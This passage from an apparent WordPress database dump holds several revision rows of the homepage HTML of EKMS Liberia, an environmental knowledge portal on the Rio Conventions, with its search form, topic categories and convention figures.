src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\"\"><figcaption></figcaption></figure>\n	<figure><img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\"\"><figcaption></figcaption></figure>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-12 01:12:58','2019-11-12 01:12:58','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(1861,1,'2019-11-12 01:13:53','2019-11-12 01:13:53','<h2>Welcome to the EKMS</h2>		\n		The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"74\">Documents</option>\n	<option value=\"76\">&nbsp;&nbsp;&nbsp;Case Studies</option>\n	<option value=\"78\">&nbsp;&nbsp;&nbsp;Conventions</option>\n	<option value=\"79\">&nbsp;&nbsp;&nbsp;Factsheets</option>\n	<option value=\"81\">&nbsp;&nbsp;&nbsp;Guides</option>\n	<option value=\"82\">&nbsp;&nbsp;&nbsp;Leaflets</option>\n	<option value=\"85\">&nbsp;&nbsp;&nbsp;Policies</option>\n	<option value=\"86\">&nbsp;&nbsp;&nbsp;Reports</option>\n	<option value=\"88\">&nbsp;&nbsp;&nbsp;Strategy and Action Plans</option>\n	<option value=\"89\">&nbsp;&nbsp;&nbsp;Toolkits</option>\n	<option value=\"112\">MEA</option>\n	<option value=\"113\">&nbsp;&nbsp;&nbsp;UNCBD</option>\n	<option value=\"115\">&nbsp;&nbsp;&nbsp;UNCCD</option>\n	<option value=\"114\">&nbsp;&nbsp;&nbsp;UNFCCC</option>\n	<option value=\"90\">Topics</option>\n	<option value=\"91\">&nbsp;&nbsp;&nbsp;Action on Climate and Sustainable Development Goals</option>\n	<option value=\"92\">&nbsp;&nbsp;&nbsp;Adaptation and Resilience</option>\n	<option value=\"93\">&nbsp;&nbsp;&nbsp;Agricultural Biodiversity</option>\n	<option value=\"94\">&nbsp;&nbsp;&nbsp;Capacity Building</option>\n	<option value=\"95\">&nbsp;&nbsp;&nbsp;Climate Finance</option>\n	<option value=\"96\">&nbsp;&nbsp;&nbsp;Climate Technology</option>\n	<option value=\"97\">&nbsp;&nbsp;&nbsp;Dry and Sub-humid land Biodiversity</option>\n	<option value=\"98\">&nbsp;&nbsp;&nbsp;Education and Youth</option>\n	<option value=\"99\">&nbsp;&nbsp;&nbsp;Forest Biodiversity</option>\n	<option value=\"100\">&nbsp;&nbsp;&nbsp;Gender</option>\n	<option value=\"101\">&nbsp;&nbsp;&nbsp;Island Biodiversity</option>\n	<option value=\"104\">&nbsp;&nbsp;&nbsp;Land and Climate</option>\n	<option value=\"105\">&nbsp;&nbsp;&nbsp;Land and Drought</option>\n	<option value=\"106\">&nbsp;&nbsp;&nbsp;Land and Human Security</option>\n	<option value=\"107\">&nbsp;&nbsp;&nbsp;Land and Sustainable Development Goals</option>\n	<option value=\"103\">&nbsp;&nbsp;&nbsp;Land Use</option>\n	<option value=\"108\">&nbsp;&nbsp;&nbsp;Local Communities and Indigenous People</option>\n	<option value=\"109\">&nbsp;&nbsp;&nbsp;Marine and Coastal Biodiversity</option>\n	<option value=\"110\">&nbsp;&nbsp;&nbsp;Mitigation</option>\n	<option value=\"111\">&nbsp;&nbsp;&nbsp;Mountain Biodiversity</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Documents</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n	<figure><a href=\"#\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg\" alt=\"featured_cbd\"><figcaption><h6>UNCBD</h6>The United Nations Convention on Biological Diversity</figcaption></a></figure>\n	<figure><img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\"\"><figcaption></figcaption></figure>\n	<figure><img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\"\"><figcaption></figcaption></figure>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-12 01:13:53','2019-11-12 01:13:53','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(1862,1,'2019-11-12 01:16:46','2019-11-12 01:16:46','<h2>Welcome to the EKMS</h2>		\n		The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"74\">Documents</option>\n	<option value=\"76\">&nbsp;&nbsp;&nbsp;Case Studies</option>\n	<option value=\"78\">&nbsp;&nbsp;&nbsp;Conventions</option>\n	<option value=\"79\">&nbsp;&nbsp;&nbsp;Factsheets</option>\n	<option value=\"81\">&nbsp;&nbsp;&nbsp;Guides</option>\n	<option value=\"82\">&nbsp;&nbsp;&nbsp;Leaflets</option>\n	<option value=\"85\">&nbsp;&nbsp;&nbsp;Policies</option>\n	<option value=\"86\">&nbsp;&nbsp;&nbsp;Reports</option>\n	<option value=\"88\">&nbsp;&nbsp;&nbsp;Strategy and Action Plans</option>\n	<option value=\"89\">&nbsp;&nbsp;&nbsp;Toolkits</option>\n	<option value=\"112\">MEA</option>\n	<option value=\"113\">&nbsp;&nbsp;&nbsp;UNCBD</option>\n	<option value=\"115\">&nbsp;&nbsp;&nbsp;UNCCD</option>\n	<option value=\"114\">&nbsp;&nbsp;&nbsp;UNFCCC</option>\n	<option value=\"90\">Topics</option>\n	<option value=\"91\">&nbsp;&nbsp;&nbsp;Action on Climate and Sustainable Development Goals</option>\n	<option value=\"92\">&nbsp;&nbsp;&nbsp;Adaptation and Resilience</option>\n	<option value=\"93\">&nbsp;&nbsp;&nbsp;Agricultural Biodiversity</option>\n	<option value=\"94\">&nbsp;&nbsp;&nbsp;Capacity Building</option>\n	<option value=\"95\">&nbsp;&nbsp;&nbsp;Climate Finance</option>\n	<option value=\"96\">&nbsp;&nbsp;&nbsp;Climate Technology</option>\n	<option value=\"97\">&nbsp;&nbsp;&nbsp;Dry and Sub-humid land Biodiversity</option>\n	<option value=\"98\">&nbsp;&nbsp;&nbsp;Education and Youth</option>\n	<option value=\"99\">&nbsp;&nbsp;&nbsp;Forest Biodiversity</option>\n	<option value=\"100\">&nbsp;&nbsp;&nbsp;Gender</option>\n	<option value=\"101\">&nbsp;&nbsp;&nbsp;Island Biodiversity</option>\n	<option value=\"104\">&nbsp;&nbsp;&nbsp;Land and Climate</option>\n	<option value=\"105\">&nbsp;&nbsp;&nbsp;Land and Drought</option>\n	<option value=\"106\">&nbsp;&nbsp;&nbsp;Land and Human Security</option>\n	<option value=\"107\">&nbsp;&nbsp;&nbsp;Land and Sustainable Development Goals</option>\n	<option value=\"103\">&nbsp;&nbsp;&nbsp;Land Use</option>\n	<option value=\"108\">&nbsp;&nbsp;&nbsp;Local Communities and Indigenous People</option>\n	<option value=\"109\">&nbsp;&nbsp;&nbsp;Marine and Coastal Biodiversity</option>\n	<option value=\"110\">&nbsp;&nbsp;&nbsp;Mitigation</option>\n	<option value=\"111\">&nbsp;&nbsp;&nbsp;Mountain Biodiversity</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Documents</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n	<figure><a href=\"#\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg\" alt=\"featured_cbd\"><figcaption><h6>UNCBD</h6>The United Nations Convention on Biological Diversity</figcaption></a></figure>\n	<figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-300x166.jpg\" alt=\"featured_fccc\"><figcaption><h6>UNFCCC</h6>The United Nations Framework Convention on Climate Change</figcaption></figure>\n	<figure><img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\"\"><figcaption></figcaption></figure>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-12 01:16:46','2019-11-12 01:16:46','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(1863,1,'2019-11-12 01:22:25','2019-11-12 01:22:25','<h2>Welcome to the EKMS</h2>		\n		The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"74\">Documents</option>\n	<option value=\"76\">&nbsp;&nbsp;&nbsp;Case Studies</option>\n	<option value=\"78\">&nbsp;&nbsp;&nbsp;Conventions</option>\n	<option value=\"79\">&nbsp;&nbsp;&nbsp;Factsheets</option>\n	<option value=\"81\">&nbsp;&nbsp;&nbsp;Guides</option>\n	<option value=\"82\">&nbsp;&nbsp;&nbsp;Leaflets</option>\n	<option value=\"85\">&nbsp;&nbsp;&nbsp;Policies</option>\n	<option value=\"86\">&nbsp;&nbsp;&nbsp;Reports</option>\n	<option value=\"88\">&nbsp;&nbsp;&nbsp;Strategy and Action Plans</option>\n	<option value=\"89\">&nbsp;&nbsp;&nbsp;Toolkits</option>\n	<option value=\"112\">MEA</option>\n	<option value=\"113\">&nbsp;&nbsp;&nbsp;UNCBD</option>\n	<option value=\"115\">&nbsp;&nbsp;&nbsp;UNCCD</option>\n	<option value=\"114\">&nbsp;&nbsp;&nbsp;UNFCCC</option>\n	<option value=\"90\">Topics</option>\n	<option value=\"91\">&nbsp;&nbsp;&nbsp;Action on Climate and Sustainable Development Goals</option>\n	<option value=\"92\">&nbsp;&nbsp;&nbsp;Adaptation and Resilience</option>\n	<option value=\"93\">&nbsp;&nbsp;&nbsp;Agricultural Biodiversity</option>\n	<option value=\"94\">&nbsp;&nbsp;&nbsp;Capacity Building</option>\n	<option value=\"95\">&nbsp;&nbsp;&nbsp;Climate Finance</option>\n	<option value=\"96\">&nbsp;&nbsp;&nbsp;Climate Technology</option>\n	<option value=\"97\">&nbsp;&nbsp;&nbsp;Dry and Sub-humid land Biodiversity</option>\n	<option value=\"98\">&nbsp;&nbsp;&nbsp;Education and Youth</option>\n	<option value=\"99\">&nbsp;&nbsp;&nbsp;Forest Biodiversity</option>\n	<option value=\"100\">&nbsp;&nbsp;&nbsp;Gender</option>\n	<option value=\"101\">&nbsp;&nbsp;&nbsp;Island Biodiversity</option>\n	<option value=\"104\">&nbsp;&nbsp;&nbsp;Land and Climate</option>\n	<option value=\"105\">&nbsp;&nbsp;&nbsp;Land and Drought</option>\n	<option value=\"106\">&nbsp;&nbsp;&nbsp;Land and Human Security</option>\n	<option value=\"107\">&nbsp;&nbsp;&nbsp;Land and Sustainable Development Goals</option>\n	<option value=\"103\">&nbsp;&nbsp;&nbsp;Land Use</option>\n	<option value=\"108\">&nbsp;&nbsp;&nbsp;Local Communities and Indigenous People</option>\n	<option value=\"109\">&nbsp;&nbsp;&nbsp;Marine and Coastal Biodiversity</option>\n	<option value=\"110\">&nbsp;&nbsp;&nbsp;Mitigation</option>\n	<option value=\"111\">&nbsp;&nbsp;&nbsp;Mountain Biodiversity</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Documents</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n	<figure><a href=\"#\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg\" alt=\"featured_cbd\"><figcaption><h6>UNCBD</h6>The United Nations Convention on Biological Diversity</figcaption></a></figure>\n	<figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-300x166.jpg\" alt=\"featured_fccc\"><figcaption><h6>UNFCCC</h6>The United Nations Framework Convention on Climate Change</figcaption></figure>\n	<figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg\" alt=\"featured_ccd\"><figcaption><h6>UNCCD</h6>The United Nations Convention to Combat Desertification</figcaption></figure>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-12 01:22:25','2019-11-12 01:22:25','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(1864,1,'2019-11-12 01:22:54','2019-11-12 01:22:54','<h2>Welcome to the EKMS</h2>		\n		The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"74\">Documents</option>\n	<option value=\"76\">&nbsp;&nbsp;&nbsp;Case Studies</option>\n	<option value=\"78\">&nbsp;&nbsp;&nbsp;Conventions</option>\n	<option value=\"79\">&nbsp;&nbsp;&nbsp;Factsheets</option>\n	<option value=\"81\">&nbsp;&nbsp;&nbsp;Guides</option>\n	<option value=\"82\">&nbsp;&nbsp;&nbsp;Leaflets</option>\n	<option value=\"85\">&nbsp;&nbsp;&nbsp;Policies</option>\n	<option value=\"86\">&nbsp;&nbsp;&nbsp;Reports</option>\n	<option value=\"88\">&nbsp;&nbsp;&nbsp;Strategy and Action Plans</option>\n	<option value=\"89\">&nbsp;&nbsp;&nbsp;Toolkits</option>\n	<option value=\"112\">MEA</option>\n	<option value=\"113\">&nbsp;&nbsp;&nbsp;UNCBD</option>\n	<option value=\"115\">&nbsp;&nbsp;&nbsp;UNCCD</option>\n	<option value=\"114\">&nbsp;&nbsp;&nbsp;UNFCCC</option>\n	<option value=\"90\">Topics</option>\n	<option value=\"91\">&nbsp;&nbsp;&nbsp;Action on Climate and Sustainable Development Goals</option>\n	<option value=\"92\">&nbsp;&nbsp;&nbsp;Adaptation and Resilience</option>\n	<option value=\"93\">&nbsp;&nbsp;&nbsp;Agricultural Biodiversity</option>\n	<option value=\"94\">&nbsp;&nbsp;&nbsp;Capacity Building</option>\n	<option value=\"95\">&nbsp;&nbsp;&nbsp;Climate Finance</option>\n	<option value=\"96\">&nbsp;&nbsp;&nbsp;Climate Technology</option>\n	<option value=\"97\">&nbsp;&nbsp;&nbsp;Dry and Sub-humid land Biodiversity</option>\n	<option value=\"98\">&nbsp;&nbsp;&nbsp;Education and Youth</option>\n	<option value=\"99\">&nbsp;&nbsp;&nbsp;Forest Biodiversity</option>\n	<option value=\"100\">&nbsp;&nbsp;&nbsp;Gender</option>\n	<option value=\"101\">&nbsp;&nbsp;&nbsp;Island Biodiversity</option>\n	<option value=\"104\">&nbsp;&nbsp;&nbsp;Land and Climate</option>\n	<option value=\"105\">&nbsp;&nbsp;&nbsp;Land and Drought</option>\n	<option value=\"106\">&nbsp;&nbsp;&nbsp;Land and Human Security</option>\n	<option value=\"107\">&nbsp;&nbsp;&nbsp;Land and Sustainable Development Goals</option>\n	<option value=\"103\">&nbsp;&nbsp;&nbsp;Land Use</option>\n	<option value=\"108\">&nbsp;&nbsp;&nbsp;Local Communities and Indigenous People</option>\n	<option value=\"109\">&nbsp;&nbsp;&nbsp;Marine and Coastal Biodiversity</option>\n	<option value=\"110\">&nbsp;&nbsp;&nbsp;Mitigation</option>\n	<option value=\"111\">&nbsp;&nbsp;&nbsp;Mountain Biodiversity</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Documents</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n	<figure><a href=\"#\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg\" alt=\"featured_cbd\"><figcaption><h6>UNCBD</h6>The United Nations Convention on Biological Diversity</figcaption></a></figure>\n	<figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fccc-300x166.jpg\" alt=\"featured_fccc\"><figcaption><h6>UNFCCC</h6>The United Nations Framework Convention on Climate Change</figcaption></figure>\n	<figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg\" alt=\"featured_ccd\"><figcaption><h6>UNCCD</h6>The United Nations Convention to Combat Desertification</figcaption></figure>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-12 01:22:54','2019-11-12 01:22:54','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(1865,1,'2019-11-12 01:26:38','2019-11-12 01:26:38','<h2>Welcome to the EKMS</h2>		\n		The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"74\">Documents</option>\n	<option value=\"76\">&nbsp;&nbsp;&nbsp;Case Studies</option>\n	<option value=\"78\">&nbsp;&nbsp;&nbsp;Conventions</option>\n	<option value=\"79\">&nbsp;&nbsp;&nbsp;Factsheets</option>\n	<option value=\"81\">&nbsp;&nbsp;&nbsp;Guides</option>\n	<option value=\"82\">&nbsp;&nbsp;&nbsp;Leaflets</option>\n	<option value=\"85\">&nbsp;&nbsp;&nbsp;Policies</option>\n	<option value=\"86\">&nbsp;&nbsp;&nbsp;Reports</option>\n	<option value=\"88\">&nbsp;&nbsp;&nbsp;Strategy and Action Plans</option>\n	<option value=\"89\">&nbsp;&nbsp;&nbsp;Toolkits</option>\n	<option value=\"112\">MEA</option>\n	<option value=\"113\">&nbsp;&nbsp;&nbsp;UNCBD</option>\n	<option value=\"115\">&nbsp;&nbsp;&nbsp;UNCCD</option>\n	<option value=\"114\">&nbsp;&nbsp;&nbsp;UNFCCC</option>\n	<option value=\"90\">Topics</option>\n	<option value=\"91\">&nbsp;&nbsp;&nbsp;Action on Climate and Sustainable Development Goals</option>\n	<option value=\"92\">&nbsp;&nbsp;&nbsp;Adaptation and Resilience</option>\n	<option value=\"93\">&nbsp;&nbsp;&nbsp;Agricultural Biodiversity</option>\n	<option value=\"94\">&nbsp;&nbsp;&nbsp;Capacity Building</option>\n	<option 